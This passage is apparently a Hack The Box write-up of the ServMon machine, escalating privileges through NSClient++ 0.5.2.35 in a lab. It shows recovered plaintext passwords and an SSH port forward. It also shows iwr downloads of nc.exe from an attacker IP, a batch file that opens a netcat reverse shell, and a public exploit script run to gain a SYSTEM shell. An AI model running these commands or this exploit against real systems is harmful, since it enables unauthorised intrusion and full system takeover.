Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 3/17/2024 4:27 AM crash-dumps
d----- 2/28/2022 6:55 PM modules
d----- 2/28/2022 6:55 PM scripts
d----- 2/28/2022 6:55 PM security
d----- 2/28/2022 6:55 PM web
-a---- 12/9/2015 12:17 AM 28672 boost_chrono-vc110-mt-1_58.dll
-a---- 12/9/2015 12:17 AM 50688 boost_date_time-vc110-mt-1_58.dll
-a---- 12/9/2015 12:17 AM 117760 boost_filesystem-vc110-mt-1_58.dll
-a---- 12/9/2015 12:22 AM 439296 boost_program_options-vc110-mt-1_58.dll
-a---- 12/9/2015 12:23 AM 256000 boost_python-vc110-mt-1_58.dll
-a---- 12/9/2015 12:17 AM 765952 boost_regex-vc110-mt-1_58.dll
-a---- 12/9/2015 12:16 AM 19456 boost_system-vc110-mt-1_58.dll
-a---- 12/9/2015 12:18 AM 102400 boost_thread-vc110-mt-1_58.dll
-a---- 1/14/2020 1:24 PM 51 boot.ini
-a---- 1/18/2018 3:51 PM 157453 changelog.txt
-a---- 1/28/2018 10:33 PM 1210392 check_nrpe.exe
-a---- 12/8/2015 11:16 PM 1655808 libeay32.dll
-a---- 11/5/2017 10:04 PM 18351 license.txt
-a---- 10/5/2017 7:19 AM 203264 lua.dll
-a---- 4/10/2020 6:32 PM 2683 nsclient.ini
-a---- 3/17/2024 4:27 AM 42608 nsclient.log
-a---- 11/5/2017 9:42 PM 55808 NSCP.Core.dll
-a---- 1/28/2018 10:32 PM 4765208 nscp.exe
-a---- 11/5/2017 9:42 PM 483328 NSCP.Protobuf.dll
-a---- 11/19/2017 4:18 PM 534016 nscp_json_pb.dll
-a---- 11/19/2017 3:55 PM 2090496 nscp_lua_pb.dll
-a---- 1/23/2018 8:57 PM 507904 nscp_mongoose.dll
-a---- 11/19/2017 3:49 PM 2658304 nscp_protobuf.dll
-a---- 11/5/2017 10:04 PM 3921 old-settings.map
-a---- 1/28/2018 10:21 PM 1973760 plugin_api.dll
-a---- 5/23/2015 8:44 AM 3017216 python27.dll
-a---- 9/27/2015 3:42 PM 28923515 python27.zip
-a---- 1/28/2018 10:34 PM 384536 reporter.exe
-a---- 12/8/2015 11:16 PM 348160 ssleay32.dll
-a---- 5/23/2015 8:44 AM 689664 unicodedata.pyd
-a---- 11/5/2017 9:20 PM 1273856 where_filter.dll
-a---- 5/23/2015 8:44 AM 47616 _socket.pyd


PS C:\Program Files\NSClient++> type nsclient.ini
# If you want to fill this file with all available options run the following command:
# nscp settings --generate --add-defaults --load-all
# If you want to activate a module and bring in all its options use:
# nscp settings --activate-module <MODULE NAME> --add-defaults
# For details run: nscp settings --help


; in flight - TODO
[/settings/default]

; Undocumented key
password = ew2x6SsGTxjRwXOT

; Undocumented key
allowed hosts = 127.0.0.1


; in flight - TODO
[/settings/NRPE/server]

; Undocumented key
ssl options = no-sslv2,no-sslv3

; Undocumented key
verify mode = peer-cert

; Undocumented key
insecure = false


; in flight - TODO
[/modules]

; Undocumented key
CheckHelpers = disabled

; Undocumented key
CheckEventLog = disabled

; Undocumented key
CheckNSCP = disabled

; Undocumented key
CheckDisk = disabled

; Undocumented key
CheckSystem = disabled

; Undocumented key
WEBServer = enabled

; Undocumented key
NRPEServer = enabled

; CheckTaskSched - Check status of your scheduled jobs.
CheckTaskSched = enabled

; Scheduler - Use this to schedule check commands and jobs in conjunction with for instance passive monitoring throu
gh NSCA
Scheduler = enabled

; CheckExternalScripts - Module used to execute external scripts
CheckExternalScripts = enabled


; Script wrappings - A list of templates for defining script commands. Enter any command line here and they will be
expanded by scripts placed under the wrapped scripts section. %SCRIPT% will be replaced by the actual script an %ARG
S% will be replaced by any given arguments.
[/settings/external scripts/wrappings]

; Batch file - Command used for executing wrapped batch files
bat = scripts\\%SCRIPT% %ARGS%

; Visual basic script - Command line used for wrapped vbs scripts
vbs = cscript.exe //T:30 //NoLogo scripts\\lib\\wrapper.vbs %SCRIPT% %ARGS%

; POWERSHELL WRAPPING - Command line used for executing wrapped ps1 (powershell) scripts
ps1 = cmd /c echo If (-Not (Test-Path "scripts\%SCRIPT%") ) { Write-Host "UNKNOWN: Script `"%SCRIPT%`" not found."; exit(3) }; scripts\%SCRIPT% $ARGS$; exit($lastexitcode) | powershell.exe /noprofile -command -


; External scripts - A list of scripts available to run from the CheckExternalScripts module. Syntax is: `command=script arguments`
[/settings/external scripts/scripts]


; Schedules - Section for the Scheduler module.
[/settings/scheduler/schedules]

; Undocumented key
foobar = command = foobar


; External script settings - General settings for the external scripts module (CheckExternalScripts).
[/settings/external scripts]
allow arguments = true
PS C:\Program Files\NSClient++>

16. Next, we keep digging into the software itself: list the install directory, look at what nscp.exe can do, and read off its version.

PS C:\Program Files\NSClient++> dir 


Directory: C:\Program Files\NSClient++


Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 3/17/2024 4:53 AM crash-dumps
d----- 2/28/2022 6:55 PM modules
d----- 2/28/2022 6:55 PM scripts
d----- 2/28/2022 6:55 PM security
d----- 2/28/2022 6:55 PM web
-a---- 12/9/2015 12:17 AM 28672 boost_chrono-vc110-mt-1_58.dll
-a---- 12/9/2015 12:17 AM 50688 boost_date_time-vc110-mt-1_58.dll
-a---- 12/9/2015 12:17 AM 117760 boost_filesystem-vc110-mt-1_58.dll
-a---- 12/9/2015 12:22 AM 439296 boost_program_options-vc110-mt-1_58.dll
-a---- 12/9/2015 12:23 AM 256000 boost_python-vc110-mt-1_58.dll
-a---- 12/9/2015 12:17 AM 765952 boost_regex-vc110-mt-1_58.dll
-a---- 12/9/2015 12:16 AM 19456 boost_system-vc110-mt-1_58.dll
-a---- 12/9/2015 12:18 AM 102400 boost_thread-vc110-mt-1_58.dll
-a---- 1/14/2020 1:24 PM 51 boot.ini
-a---- 1/18/2018 3:51 PM 157453 changelog.txt
-a---- 1/28/2018 10:33 PM 1210392 check_nrpe.exe
-a---- 12/8/2015 11:16 PM 1655808 libeay32.dll
-a---- 11/5/2017 10:04 PM 18351 license.txt
-a---- 10/5/2017 7:19 AM 203264 lua.dll
-a---- 4/10/2020 6:32 PM 2683 nsclient.ini
-a---- 3/17/2024 4:53 AM 42946 nsclient.log
-a---- 11/5/2017 9:42 PM 55808 NSCP.Core.dll
-a---- 1/28/2018 10:32 PM 4765208 nscp.exe
-a---- 11/5/2017 9:42 PM 483328 NSCP.Protobuf.dll
-a---- 11/19/2017 4:18 PM 534016 nscp_json_pb.dll
-a---- 11/19/2017 3:55 PM 2090496 nscp_lua_pb.dll
-a---- 1/23/2018 8:57 PM 507904 nscp_mongoose.dll
-a---- 11/19/2017 3:49 PM 2658304 nscp_protobuf.dll
-a---- 11/5/2017 10:04 PM 3921 old-settings.map
-a---- 1/28/2018 10:21 PM 1973760 plugin_api.dll
-a---- 5/23/2015 8:44 AM 3017216 python27.dll
-a---- 9/27/2015 3:42 PM 28923515 python27.zip
-a---- 1/28/2018 10:34 PM 384536 reporter.exe
-a---- 12/8/2015 11:16 PM 348160 ssleay32.dll
-a---- 5/23/2015 8:44 AM 689664 unicodedata.pyd
-a---- 11/5/2017 9:20 PM 1273856 where_filter.dll
-a---- 5/23/2015 8:44 AM 47616 _socket.pyd


PS C:\Program Files\NSClient++> .\nscp.exe
Usage: nscp <context>
The <context> is the mode of operation ie. a type of command.
You can also use aliases here which are shorthands for 'nscp client --module <plugin>'
Available context are:
client
Act as a client. This will run commands inside various installed modules and scripts.

help
Display the help screen.

service
Install/uninstall/display NSCP service.

settings
Change and list settings as well as load and initialize modules.

unit
Run unit test scripts.

Available aliases are:
check_mk (same as nscp client --module CheckMKClient)
Use a check_mk (the protocol) client to request information from other systems via check_mk.

eventlog (same as nscp client --module CheckEventLog)
Inject event log message into the eventlog (mainly for testing eventlog filtering and setup)

ext (same as nscp client --module CheckExternalScripts)
TODO: describe: ext

ext-scr (same as nscp client --module CheckExternalScripts)
TODO: describe: ext-scr

lua (same as nscp client --module LUAScript)
Execute lua scripts

mk (same as nscp client --module CheckMKClient)
Use a check_mk (the protocol) client to request information from other systems via check_mk.

nrpe (same as nscp client --module NRPEClient)
Use a NRPE client to request information from other systems via NRPE similar to standard NRPE check_nrpe command.

nsca (same as nscp client --module NSCAClient)
Use a NSCA to submit passive checks to a remote system. Similar to the send_nsca command

nscp (same as nscp client --module NSCPClient)
Use a NSCP (the protocol) client to request information from other systems via NSCP.

op5 (same as nscp client --module Op5Client)
TODO: describe: op5

py (same as nscp client --module PythonScript)
Execute python scripts

python (same as nscp client --module PythonScript)
Execute python scripts

sys (same as nscp client --module CheckSystem)
Various system tools to get information about the system (generally PDH on windows curretly)

syslog (same as nscp client --module SyslogClient)
Use SYSLOG (the protocol) to submit messages to a remote system.

test (same as nscp client --module CommandClient)
The best way to diagnose and find errors with your configuration and setup.

web (same as nscp client --module WEBServer)
TODO: describe: web

wmi (same as nscp client --module CheckWMI)
Run WMI queries from command line

A short list of all available contexts are:
client, help, service, settings, unit, check_mk, eventlog, ext, ext-scr, lua, mk, nrpe, nsca, nscp, op5, py, python, sys, syslog, test, web, wmi
PS C:\Program Files\NSClient++> .\nscp.exe help
Allowed options:

Common options:
--settings arg Override (temporarily) settings subsystem to
use
--debug Set log level to debug (and show debug
information)
--log arg The log level to use
--define arg Defines to use to override settings. Syntax is
PATH:KEY=VALUE

Common options:
--help Show the help message for a given command
--no-stderr Do not report errors on stderr
--version Show version information

Service Options:
--install Install service
--uninstall Uninstall service
--start Start service
--stop Stop service
--restart Stop than start service
--info Show information about service
--run Run as a service
--name arg Name of service
--description arg Description of service

Settings options:
--migrate-to arg Migrate (copy) settings from current store to
given target store
--migrate-from arg Migrate (copy) settings from old given store to
current store
--generate [=arg(=settings)] Add comments to the current settings store (or
a given one).
--add-missing Add all default values for all missing keys.
--validate Validate the current configuration (or a given
configuration).
--load-all Load all plugins (currently only used with
generate).
--path arg Path of key to work with.
--key arg Key to work with.
--set arg Set a key and path to a given value (use --key
and --path).
--switch arg Set default context to use (similar to migrate
but does NOT copy values)
--show Show a value given a key and path.
--list List all keys given a path.
--add-defaults Same as --add-missing
--remove-defaults Remove all keys which have default values (and
--use-samples Add sample commands provided by some sections
such as targets and real time filters
--activate-module arg Add a module (and its configuration options) to
the configuration.

Client Options:
--load-all Load all plugins.
-e [ --exec ] arg Run a command (execute)
-b [ --boot ] Boot the client before executing command
(similar as running the command from test mode)
-q [ --query ] arg Run a query with a given name
-s [ --submit ] arg Submit passive check result
-M [ --module ] arg Load specific module (in other words do not
auto detect module)
-a [ --argument ] arg List of arguments (arguments gets -- prefixed
automatically (--argument foo=bar is the same
as setting "--foo bar")
--raw-argument arg List of arguments (does not get -- prefixed)


First argument has to be one of the following: client, help, service, settings, unit,
Or on of the following client aliases: check_mk, eventlog, ext, ext-scr, lua, mk, nrpe, nsca, nscp, op5, py, python, sys, syslog, test, web, wmi,
PS C:\Program Files\NSClient++> .\nscp.exe --version
NSClient++, Version: 0.5.2.35 2018-01-28, Platform: x64
PS C:\Program Files\NSClient++>

17. Searching for that exact version turns up a public authenticated remote code execution exploit:

NSClient++ 0.5.2.35

https://www.exploit-db.com/exploits/46802

18. The web interface password can also be read straight out of the software, with no need to parse nsclient.ini by hand (it is the same value as the `password` key under `[/settings/default]` above):

PS C:\Program Files\NSClient++> .\nscp.exe web -- password --display
Current password: ew2x6SsGTxjRwXOT
PS C:\Program Files\NSClient++>

19. There is a snag: the password is correct, yet logging in to the web interface from Kali keeps failing.

https://10.10.10.184:8443/index.html#/

20. Looking back at the configuration dumped during enumeration, the reason is a host restriction, not a bad password. NSClient++ only accepts connections from the loopback address:

; Undocumented key
allowed hosts = 127.0.0.1

21. Because the web interface only accepts connections that arrive from 127.0.0.1, the request has to originate on the box itself. An SSH local forward (-L) does exactly that: port 8443 on Kali is tunnelled to 127.0.0.1:8443 on the target, so NSClient++ sees the connection coming from localhost. sshpass supplies nadine's password non-interactively.

┌──(kali㉿offsec)-[~/Desktop]
└─$ sshpass -p 'L1k3B1gBut7s@W0rk' ssh nadine@10.10.10.184 -L 8443:127.0.0.1:8443


Microsoft Windows [Version 10.0.17763.864]
(c) 2018 Microsoft Corporation. All rights reserved.

nadine@SERVMON C:\Users\Nadine>

22. With the forward in place the web interface is reachable, though sluggish. My first plan was to get a reverse shell by hand, following the manual steps from the exploit-db advisory linked above: stage nc.exe on the box, wrap it in a batch file, register that file as an external script, and have the Scheduler run it.

Download nc.exe and the batch file that launches it:

PS C:\> mkdir temp


Directory: C:\


---- ------------- ------ ----
d----- 3/17/2024 5:27 AM temp


PS C:\> dir


Directory: C:\


Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 3/17/2024 3:36 AM inetpub
d----- 9/15/2018 12:19 AM PerfLogs
d-r--- 2/28/2022 6:55 PM Program Files
d----- 2/28/2022 6:07 PM Program Files (x86)
d----- 2/28/2022 7:02 PM RecData
d----- 2/28/2022 6:35 PM Shared
d----- 3/17/2024 5:27 AM temp
d-r--- 2/28/2022 7:04 PM Users
d----- 2/28/2022 6:02 PM Windows


PS C:\> iwr -uri http://10.10.14.11:8000/nc.exe -Outfile C:\temp\nc.exe
PS C:\>
PS C:\> cd .\temp\
PS C:\temp> dir


Directory: C:\temp


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 3/17/2024 5:27 AM 68608 nc.exe


PS C:\temp> iwr -uri http://10.10.14.11:8000/evil.bat -Outfile C:\temp\evil.bat
PS C:\temp> dir


Directory: C:\temp


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 3/17/2024 5:29 AM 52 evil.bat
-a---- 3/17/2024 5:27 AM 68608 nc.exe


PS C:\temp>

PS C:\temp> type .\evil.bat
@echo off
C:\temp\nc.exe 10.10.14.11 443 -e cmd.exe
PS C:\temp>

9. Add script foobar to call evil.bat and save settings
- Settings > External Scripts > Scripts
- Add New
- foobar
command = c:\temp\evil.bat

10-11. Add a schedule to call the script every 1 minute and save settings
- Settings > Scheduler > Schedules
- Add new
- foobar
interval = 1m
command = foobar

23. Every variation of this through the web UI ended in errors, so I fell back to the other public exploit script, which drives the same web API directly:

https://www.exploit-db.com/exploits/48360

24. Running it against the forwarded port (127.0.0.1:8443 on Kali) with the recovered password and the staged nc.exe as the payload gives a reverse shell straight away:

┌──(kali㉿offsec)-[~/Desktop]
└─$ python3 48360.py -t 127.0.0.1 -P 8443 -p ew2x6SsGTxjRwXOT -c 'C:\temp\nc.exe 10.10.14.11 443 -e cmd.exe'
[!] Targeting base URL https://127.0.0.1:8443
[!] Obtaining Authentication Token . . .
[+] Got auth token: F69AzBlax3CF3EDNhm3soLBPh71Yexui
[!] Enabling External Scripts Module . . .
[!] Configuring Script with Specified Payload . . .
[+] Added External Script (name: BJWoaXioB)
[!] Saving Configuration . . .
[!] Reloading Application . . .
[!] Waiting for Application to reload . . .
[!] Obtaining Authentication Token . . .
[+] Got auth token: frAQBc8Wsa1xVPfvJcrgRYwTiizs2trQ
[!] Triggering payload, should execute shortly . . .
[!] Timeout exceeded. Assuming your payload executed . . .


┌──(kali㉿offsec)-[~/Desktop]
└─$ nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.11] from (UNKNOWN) [10.10.10.184] 51188
Microsoft Windows [Version 10.0.17763.864]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Program Files\NSClient++>whoami
whoami
nt authority\system

C:\Program Files\NSClient++>

25. NSClient++ runs as NT AUTHORITY\SYSTEM, so the shell can read the root flag directly:

C:\Program Files\NSClient++>cd C:/Users/Administrator
cd C:/Users/Administrator

C:\Users\Administrator>cd Desktop
cd Desktop

C:\Users\Administrator\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 20C1-47A1

Directory of C:\Users\Administrator\Desktop

02/28/2022 07:56 PM <DIR> .
02/28/2022 07:56 PM <DIR> ..
03/17/2024 03:29 AM 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 6,095,605,760 bytes free

C:\Users\Administrator\Desktop>type root.txt
type root.txt
b76c8640f3363d576d50ffb7da187ba1

C:\Users\Administrator\Desktop>

0x03 Completion proof

https://www.hackthebox.com/achievement/machine/1705469/240


Source: https://sh1yan.top/2024/03/17/ServMon-htb-writeup/
Author: shiyan
Published: 17 March 2024